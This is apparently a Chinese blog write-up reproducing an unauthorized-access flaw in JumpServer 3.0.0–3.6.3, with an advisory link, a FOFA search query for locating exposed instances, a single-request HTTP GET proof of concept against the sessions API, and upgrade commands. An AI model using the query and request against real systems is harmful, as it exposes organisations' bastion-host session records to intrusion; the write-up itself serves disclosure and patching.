1、简介

JumpServer是一款符合4A规范的开源堡垒机，帮助企业以更安全的方式管控和登录各种类型的资产，实现事前授权、事中监察、事后审计，满足等保合规要求。

2、漏洞描述

JumpServer 在 3.0.0-3.6.3 版本存在未授权访问漏洞。由于系统权限配置存在不合理，导致未授权攻击者可以直接访问 /api/v1/terminal/sessions/ 相关路由
漏洞公告：https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw

3、受影响版本

3.0.0 <= JumpServer <= 3.6.3

4、FOFA语

fofa：app="JumpServer-堡垒机"

5、漏洞复现

POC

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

6、整改建议

升级到安全版本：JumpServer >= 3.5.5 JumpServer >= 3.6.4

./jmsctl.sh backup_db  #备份数据库
./jmsctl.sh check_update  #检查可用更新
./jmsctl.sh upgrade [version]  #升级指定版本
./jmsctl.sh start  #启动jumpserver

本栏目推荐文章
• 2023年度总结
• CSP-J/S 2023 游记
• Libevent [补档-2023-08-29]
• 本地套接字 [补档-2023-07-24]
• UDP通信 [补档-2023-07-22]
• 多路io复用Select [补档-2023-07-16]
• 多路io复用pool [补档-2023-07-19]
• 多路io复用epoll [补档-2023-07-20]
• socket编程 [补档-2023-07-10]
• OFBiz RCE漏洞复现（CVE-2023-51467）

漏洞 JumpServer 42442 2023 CVE漏洞jumpserver 42442 2023 2023漏洞cve e-office 漏洞27372 2023 cve 漏洞分析jumpserver漏洞 漏洞jumpserver密码42820 漏洞2017 7921 cve 2020 jquery-xss漏洞cve 漏洞2018 2894 cve 2021漏洞cve qemu 漏洞cve shell 2019